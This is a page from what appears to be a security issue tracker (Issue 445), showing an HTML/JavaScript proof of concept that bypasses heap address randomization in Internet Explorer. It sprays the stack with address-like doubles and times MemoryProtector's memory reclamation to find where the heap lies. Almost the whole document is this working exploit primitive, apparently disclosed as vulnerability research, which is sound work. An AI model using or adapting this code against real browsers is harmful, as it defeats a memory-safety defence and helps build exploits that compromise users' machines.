New issue
Advanced search Search tips

Issue 445 attachment: heaslr_bypass_via_memoryprotector.html (5.0 KB) 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
 
<html>
<head>
<script>

var button = document.createElement("button");
var s_large = new Array(0x100000/2-0x1000/2).join("a");
var s_small1 = new Array(20).join("b");
var s_small2 = new Array(20).join("c");

// Triger MemoryProtector::ReclaimMemory by freeing a large object 
// and measure the time it takes.
function free() {
  button.title = s_large;

  // MemoryProtector does not trigger on this free but the next one
  // despite freeing over 100.000 bytes (MemoryProtector threshold)
  // This might be a bug. If MS changes this behavior, remove the
  // following line. Threhold might need adjustment in that case.
  button.title = s_small1;

  var start_time = window.performance.now();
  button.title = s_small2;
  var end_time = window.performance.now();

  return (end_time - start_time);
}

// Tests if the allocation happens in the memory range between min and max
// by spraying the stack with addresses in [min, max] range and triggering MemoryProtector.
function test(min, max) {
  var o = new Object();

  // Converts the next untested address to its double (IEEE 754) representation.
  o.getNextDouble = function() {
    // All relevant values are going to be subnormal
    // so the conversion is a simple matter of multiplying
    // with a constant.
    cur = this.cur;
    this.cur += 0x1000;
    return 4.9406564584124654E-324 * cur;
  }

  o.recursive = function() {
    this.depth += 1;
    if(this.cur >= this.max) {
      //alert(this.depth);
      this.ret = free();
      return 1;
    } else {
      // Spray the stack
      return (
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        (this.getNextDouble() * 
        this.recursive())))))))))))))))))))))))))))))))));
    }
  }

  
  o.depth = 0;
  o.min = min;
  o.max = max;
  o.cur = min + 0x40; //change to 0x20 if testing on 32-bit IE process.

  o.recursive();

  return o.ret;
}

// Comparator function for sorting the address ranges.
function compare_ranges(a, b) {
  return a.time - b.time;
}

// Measures time 
function test_ranges(ranges) {
  for(var i=0;i<ranges.length ;i++) {
    ranges[i].time = test(ranges[i].min, ranges[i].max);
  }
}

// Main function
function go() {
  var min = 0; // Minumum address to test
  var max = 0x10000000000; // Maximum address to test

  var range_size = 0x4000000;
  var num_fake_ranges = 50;

  var threshold = 1.2;

  var start_time = window.performance.now();

  // Prepare the ranages array. 
  // We'll add some fake ranges at the beginning so that the 
  // times get more stable before we reach the "real ones".
  var num_ranges = (max - min) / range_size;
  ranges = new Array(num_ranges + num_fake_ranges);
  for(var i=0; i<num_fake_ranges ;i++) {
    ranges[i] = { min: 0x33, max: range_size + 0x33, time: 0 };
  }
  for(var i=0; i<num_ranges ;i++) {
    ranges[i + num_fake_ranges] = { min: min + i*range_size, max: min + (i+1)*range_size, time: 0 };
  }

  // Do the timig tests.
  test_ranges(ranges);

  // Remove fake ranges.
  ranges.splice(0, 50);

  // Sort according to timing.
  ranges.sort(compare_ranges);
 
  var end_time = window.performance.now();
  var run_time = (end_time - start_time)/1000;

  // Check if the experiments were successful.
  if (ranges[0].time * threshold < ranges[1].time) {
    ret_str = "Memory allocation detected in the range [0x" + ranges[0].min.toString(16) + ", 0x" + ranges[0].max.toString(16) + "].<br>";
  } else {
    ret_str = "Results inconclusive, try again.<br>";
  }
  ret_str += "Tests took " + run_time.toString() + " seconds.<br>";
  ret_str += "<br>Details:<br>"
  for(var i=0;i<ranges.length;i++) {
    ret_str += "Range: [0x" + ranges[i].min.toString(16) + ", 0x" + ranges[i].max.toString(16) + "], time(ms): " + ranges[i].time + "<br>";
  }

  document.getElementById("result").innerHTML = ret_str;
}

</script>
</head>
<body>
<button onclick="go()">Dude, where's my heap?</button>
<div id="result"></div>
</body>
</html>